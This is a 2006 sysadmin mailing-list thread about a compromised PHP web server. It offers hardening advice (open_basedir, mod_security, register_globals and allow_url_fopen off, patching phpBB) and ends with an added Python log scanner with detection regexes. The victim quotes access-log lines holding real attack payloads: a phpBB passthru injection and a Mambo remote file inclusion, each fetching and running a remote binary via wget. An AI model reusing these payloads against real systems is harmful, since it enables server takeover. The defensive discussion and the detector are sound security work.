php_admin_value "open_basedir" "/path/to/domain/dir/htdocs:/path/to/other/include/dirs"
php_admin_value "upload_tmp_dir" "/path/to/domain/dir/htdocs/phpuploadtmpdir"
This will allow PHP to open files only in those directories. If you allow file uploads, then you should change the upload temp path to be inside one of the open_basedir directories.
--
Jose Canciani.
On 2/10/06, Peter Maag <[EMAIL PROTECTED]> wrote:
I would personally set up mod_security as well. It should stop most of these types of attacks right away with default settings.
Peter
On 2/10/06, David <[EMAIL PROTECTED]> wrote:
Bill Shupp wrote:
> David wrote:
>
>> Thanks Peter - reassuring to know that someone else thinks they probably
>> didn't get root... I have been watching ps and netstat -p and haven't
>> seen anything suspicious, nor seen any more rogue messages in my mail
>> queue... fingers crossed :) I have plans to replace this box ASAP however.
>>
>> I uncovered this in the apache logs:
>>
>> ./www.myvirtualhost.domain-access_log: 86.35.6.242 - -
>> [25/Jul/2005:21:32:12 +0930] "GET /store/phpbb2/viewtopic.php?t=2&rush=%
>> 65%63%68%6F%20%5F%53%54%41%52%54%5F%3B%20cd%20/tmp;wget%20www.cycomm.info/priv8/bin.tar.gz;tar%20xzvf%20bin.tar.gz;bin/bsh;ls%20-sa%
>>
>> 3B%20%65%63%68%6F%20%5F%45%4E%44%5F&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5F%47%45%54%5F%56%41%52%53%5B%72%75%7
>>
>> 3%68%5D%29.%2527 HTTP/1.1" 200 21138 "-" "Mozilla/4.0 (compatible; MSIE
>> 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)"
>>
>> looks bad, a phpbb exploit perhaps, but the date is wrong... hoping the
>> system weathered that one. Closer to date is:
>>
>> ./myvirtualhost.domain-error_log:[Sun Jan 15 22:51:53 2006] [error]
>> [client 85.214.20.161] request failed: erroneous characters after protocol string: GET
>> /php/mambo/index2.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http:
>>
>> //209.136.48.69/cmd.gif?&cmd=cd%20/tmp;wget%20209.136.48.69/micu;chmod%20744%20micu;./micu;echo%20YYY;echo|
>> HTTP\\x01.1
>>
>> But it looks like that one failed. Oh well time to update php and clean
>> out a few old phpbb installs. Thanks all for your help.
>>
>> David
>>
>
>
> A few things I always run into with PHP that are popular:
>
> 1) Make sure PHPBB is the latest version and not exploitable. I used to
> allow my clients to install it, but every few months, SOMEONE would
> install an old exploitable version. I've switched to using debian's
> PHPBB package, and just point clients to it so I don't have to keep
> track of it anymore. I just run security updates daily instead on all
> packages. Haven't been exploited since.
>
> 2) Keep register_globals off, and only turn it on as needed.
>
> 3) Make sure allow_url_fopen is set to OFF. This is a very popular one,
> and in my experience tends to attract DDoS attacks rather than a mail
> exploit. But costs you expensive bandwidth nonetheless.
>
> Regards,
>
> Bill
>
Cheers Bill, register_globals always off, but now I will probably
disable url file operations too. Perhaps just enable them on a per-site
setting
David
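
The two request shapes quoted in this thread can be searched for in Apache access logs with the scanner below, which is an added example and not part of any poster's message. It percent-decodes each query string repeatedly (the phpBB request hides its quotes as `%2527`) and flags PHP execution calls, remote URLs passed as parameter values, superglobal overwrites and shell download commands. The rule set, function names and sample log lines are assumptions constructed for illustration.

```python
import re
from urllib.parse import unquote

# Constructed sample access-log lines modelled on the two request shapes quoted
# in the thread; addresses and hosts are documentation placeholders.
SAMPLE_LOG = [
    '192.0.2.10 - - [10/Feb/2006:10:00:00 +0000] "GET /forum/viewtopic.php?t=2 HTTP/1.1" 200 5120',
    '192.0.2.66 - - [10/Feb/2006:10:01:00 +0000] "GET /forum/viewtopic.php?t=2&rush=%69%64&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5F%47%45%54%5F%56%41%52%53%5B%72%75%73%68%5D%29.%2527 HTTP/1.1" 200 21138',
    '198.51.100.7 - - [10/Feb/2006:10:02:00 +0000] "GET /mambo/index2.php?GLOBALS=&mosConfig_absolute_path=http://example.invalid/cmd.gif?&cmd=id HTTP/1.1" 404 312',
]

# Heuristic rules (assumed for this example), applied to the decoded query string.
RULES = {
    "php_exec_call": re.compile(r"\b(passthru|system|shell_exec|exec|popen)\s*\(", re.I),
    "remote_url_param": re.compile(r"=\s*(https?|ftp)://", re.I),
    "superglobal_overwrite": re.compile(r"(^|&)(GLOBALS|_REQUEST|_GET|_POST|_COOKIE)(\[|=)"),
    "shell_download": re.compile(r"\b(wget|curl)\s+\S+", re.I),
}
REQUEST_RE = re.compile(r'"(?:GET|POST|HEAD) (\S+)')

def fully_decode(value, max_rounds=3):
    """Percent-decode repeatedly so double-encoded input such as %2527 is exposed."""
    for _ in range(max_rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value

def scan_line(line):
    """Return the sorted rule names matched by one access-log line."""
    m = REQUEST_RE.search(line)
    if not m:
        return []
    _, _, query = m.group(1).partition("?")
    decoded = fully_decode(query)
    return sorted(name for name, rx in RULES.items() if rx.search(decoded))

def scan(lines):
    """Map client address -> set of matched rule names, for flagged lines only."""
    hits = {}
    for line in lines:
        matched = scan_line(line)
        if matched:
            hits.setdefault(line.split(" ", 1)[0], set()).update(matched)
    return hits

if __name__ == "__main__":
    for client, rules in scan(SAMPLE_LOG).items():
        print(client, ", ".join(sorted(rules)))
```

A `remote_url_param` hit is the request that `allow_url_fopen` Off is meant to neutralise, and `superglobal_overwrite` is the one that depends on `register_globals`.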
